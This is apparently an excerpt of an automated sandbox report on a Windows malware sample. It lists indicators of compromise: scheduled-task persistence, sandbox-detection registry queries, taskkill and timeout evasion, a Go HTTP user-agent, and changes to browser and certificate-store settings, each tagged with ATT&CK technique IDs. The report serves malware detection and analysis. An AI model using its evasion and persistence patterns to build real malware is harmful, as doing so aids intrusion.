File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File created	C:\Windows\AppCompat\Programs\Amcache.hve.tmp	WerFault.exe
File opened for modification	C:\Windows\inf\oem2.inf	DrvInst.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new	Conhost.exe
File created	C:\Windows\Tasks\byGaxHSkIutywxzLoY.job	schtasks.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	DrvInst.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 22 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4944	4208	WerFault.exe	loboydfybij.exe
4632	4208	WerFault.exe	loboydfybij.exe
4396	4208	WerFault.exe	loboydfybij.exe
4988	4208	WerFault.exe	loboydfybij.exe
4124	4208	WerFault.exe	loboydfybij.exe
2588	4208	WerFault.exe	loboydfybij.exe
5208	4208	WerFault.exe	loboydfybij.exe
5252	5856	WerFault.exe	XagdaNLKU.exe
5380	5348	WerFault.exe	fdrnjk1bsri.exe
8056	5348	WerFault.exe	fdrnjk1bsri.exe
7216	5348	WerFault.exe	fdrnjk1bsri.exe
7080	5348	WerFault.exe	fdrnjk1bsri.exe
5560	5348	WerFault.exe	fdrnjk1bsri.exe
7608	5348	WerFault.exe	fdrnjk1bsri.exe
4188	5348	WerFault.exe	fdrnjk1bsri.exe
7392	6936	WerFault.exe	axl4f0wpmpz.exe
6840	6936	WerFault.exe	axl4f0wpmpz.exe
7680	6936	WerFault.exe	axl4f0wpmpz.exe
7436	6936	WerFault.exe	axl4f0wpmpz.exe
5928	6936	WerFault.exe	axl4f0wpmpz.exe
1424	6936	WerFault.exe	axl4f0wpmpz.exe
6820	6936	WerFault.exe	axl4f0wpmpz.exe

Checks SCSI registry key(s) 3 TTPs 64 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

svchost.exeDrvInst.exeprivacytools5.exeWerFault.exetapinstall.exeDrvInst.exeprivacytools5.exesvchost.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\LowerFilters	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000	DrvInst.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	privacytools5.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Mfg	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID	WerFault.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID	tapinstall.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Capabilities	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\UpperFilters	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Mfg	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Phantom	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051	svchost.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	privacytools5.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\CompatibleIDs	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Capabilities	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000	WerFault.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E	svchost.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	privacytools5.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\CompatibleIDs	WerFault.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002	svchost.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

CDB6.tmp.exeSetup.exeSetup.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	CDB6.tmp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	CDB6.tmp.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Setup.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Setup.exe

Creates scheduled task(s) 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

7592 schtasks.exe
4956 schtasks.exe
6652 schtasks.exe
2776 schtasks.exe
6812 schtasks.exe
7032 schtasks.exe
5484 schtasks.exe
Delays execution with timeout.exe 3 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exe

pid process

5872 timeout.exe
6012 timeout.exe
4824 timeout.exe

pid	process
7592	schtasks.exe
4956	schtasks.exe
6652	schtasks.exe
2776	schtasks.exe
6812	schtasks.exe
7032	schtasks.exe
5484	schtasks.exe

pid	process
5872	timeout.exe
6012	timeout.exe
4824	timeout.exe

Enumerates system info in registry 2 TTPs 10 IoCs

Query Registry

System Information Discovery

Processes:

multitimer.exemultitimer.exesetup.exemultitimer.exesetup.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	multitimer.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	multitimer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	multitimer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	multitimer.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	multitimer.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	setup.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	multitimer.exe

GoLang User-Agent 6 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

Processes:

description	flow	ioc
HTTP User-Agent header	727	Go-http-client/1.1
HTTP User-Agent header	731	Go-http-client/1.1
HTTP User-Agent header	733	Go-http-client/1.1
HTTP User-Agent header	735	Go-http-client/1.1
HTTP User-Agent header	737	Go-http-client/1.1
HTTP User-Agent header	739	Go-http-client/1.1

Kills process with taskkill 8 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

4556 taskkill.exe
7988 taskkill.exe
6864 taskkill.exe
7304 taskkill.exe
5744 taskkill.exe
8152 taskkill.exe
584 taskkill.exe
4748 taskkill.exe

pid	process
4556	taskkill.exe
7988	taskkill.exe
6864	taskkill.exe
7304	taskkill.exe
5744	taskkill.exe
8152	taskkill.exe
584	taskkill.exe
4748	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

Processes:

MicrosoftEdge.exeMicrosoftEdgeCP.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

csrss.exepowershell.exepowershell.exemask_svc.exesetup.exeDrvInst.exeapp.exenetsh.exeapp.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-672 = "AUS Eastern Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-105 = "Central Brazilian Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1472 = "Magadan Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2391 = "Aleutian Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	setup.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	DrvInst.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-291 = "Central European Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-961 = "Paraguay Daylight Time"	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	setup.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-262 = "GMT Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-271 = "Greenwich Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2772 = "Omsk Standard Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	app.exe
Key created	\REGISTRY\USER\.DEFAULT\System\CurrentControlSet\Control	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	DrvInst.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2591 = "Tocantins Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2042 = "Eastern Standard Time (Mexico)"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-211 = "Pacific Daylight Time"	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2631 = "Norfolk Daylight Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	setup.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-341 = "Egypt Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-261 = "GMT Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-561 = "SE Asia Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	DrvInst.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1021 = "Bangladesh Daylight Time"	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1871 = "Russia TZ 7 Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1911 = "Russia TZ 10 Daylight Time"	csrss.exe
